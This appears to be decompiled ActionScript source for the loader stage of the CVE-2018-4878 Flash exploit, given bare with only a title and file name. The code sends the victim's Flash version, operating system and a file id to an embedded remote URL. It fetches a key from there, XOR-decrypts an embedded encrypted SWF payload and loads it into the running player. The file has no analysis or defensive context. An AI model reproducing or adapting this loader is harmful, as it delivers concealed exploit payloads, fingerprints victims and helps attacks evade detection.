CVE-2018-4878 ActionScript for pre-decrypted SWF

loadswf.as

package
{
   import flash.display.Loader;
   import flash.display.Sprite;
   import flash.events.Event;
   import flash.events.IOErrorEvent;
   import flash.events.SecurityErrorEvent;
   import flash.net.URLLoader;
   import flash.net.URLRequest;
   import flash.system.Capabilities;
   import flash.text.TextField;
   import flash.utils.ByteArray;
   import mx.utils.StringUtil;

   public class loadswf extends Sprite
   {


      private var SWFBClass:Class;

      private var MyURL:Class;

      private var txtfld:TextField;

      var id_len:uint = 100;

      var sz_swf_head:uint = 10;

      var binData:ByteArray;

      var myUrlReqest:URLRequest;

      var myUrlLoader:URLLoader;

      public function loadswf()
      {
         this.SWFBClass = loadswf_SWFBClass;
         this.MyURL = loadswf_MyURL;
         this.txtfld = new TextField();
         this.myUrlReqest = new URLRequest();
         this.myUrlLoader = new URLLoader();
         super();
         this.txtfld.width = 500;
         this.txtfld.height = 1000;
         addChild(this.txtfld);
         this.myUrlLoader.addEventListener(Event.COMPLETE,this.Decript);
         this.myUrlLoader.addEventListener(IOErrorEvent.IO_ERROR,this.OnIOErrorHandle);
         this.myUrlLoader.addEventListener(SecurityErrorEvent.SECURITY_ERROR,this.OnSecurityErrorHandle);
         this.binData = new this.SWFBClass() as ByteArray;
         this.SendGetSwfKeyReqest();
      }

      public function SendGetSwfKeyReqest() : void
      {
         var swf_id:ByteArray = new ByteArray();
         var strDbg:String = !!Capabilities.isDebugger?"-D":"";
         var my_url:ByteArray = new this.MyURL() as ByteArray;
         swf_id.writeBytes(this.binData,this.sz_swf_head,this.id_len);
         this.myUrlReqest.url = StringUtil.trim(my_url.toString());
         this.myUrlReqest.url = this.myUrlReqest.url + ("?id=" + this.Array2String(swf_id));
         this.myUrlReqest.url = this.myUrlReqest.url + ("&fp_vs=" + Capabilities.version.replace(",",".") + strDbg);
         this.myUrlReqest.url = this.myUrlReqest.url + ("&os_vs=" + Capabilities.os);
         this.myUrlLoader.load(this.myUrlReqest);
      }

      private function Array2String(data:ByteArray, split:String = "") : String
      {
         var char:String = null;
         var res:String = "";
         for(var i:int = 0; i < data.length; i++)
         {
            char = data[i].toString(16).toUpperCase();
            if(char.length == 1)
            {
               char = "0" + char;
            }
            res = res + (char + split);
         }
         return res;
      }

      public function Decript(event:Event) : void
      {
         var j:int = 0;
         var loader:URLLoader = URLLoader(event.target);
         var swf_key_txt:String = loader.data;
         var decData:ByteArray = new ByteArray();
         var swf_key:ByteArray = new ByteArray();
         for(var i:int = 0; i < swf_key_txt.length; i = i + 2)
         {
            swf_key.writeByte(uint("0x" + swf_key_txt.substr(i,2)));
         }
         decData.writeBytes(this.binData,0,this.sz_swf_head);
         this.binData.position = this.sz_swf_head + this.id_len;
         var n:uint = this.binData.readUnsignedInt();
         this.binData.position = 0;
         for(i = this.sz_swf_head + this.id_len + 4; i < this.binData.length; i = i + 100)
         {
            for(j = 0; j < this.id_len; j++)
            {
               decData.writeByte(this.binData[i + j] ^ swf_key[j]);
            }
         }
         var l:Loader = new Loader();
         l.loadBytes(decData);
         addChild(l);
      }

      public function OnIOErrorHandle(event:IOErrorEvent) : void
      {
      }

      public function OnSecurityErrorHandle(event:SecurityErrorEvent) : void
      {
      }
   }
}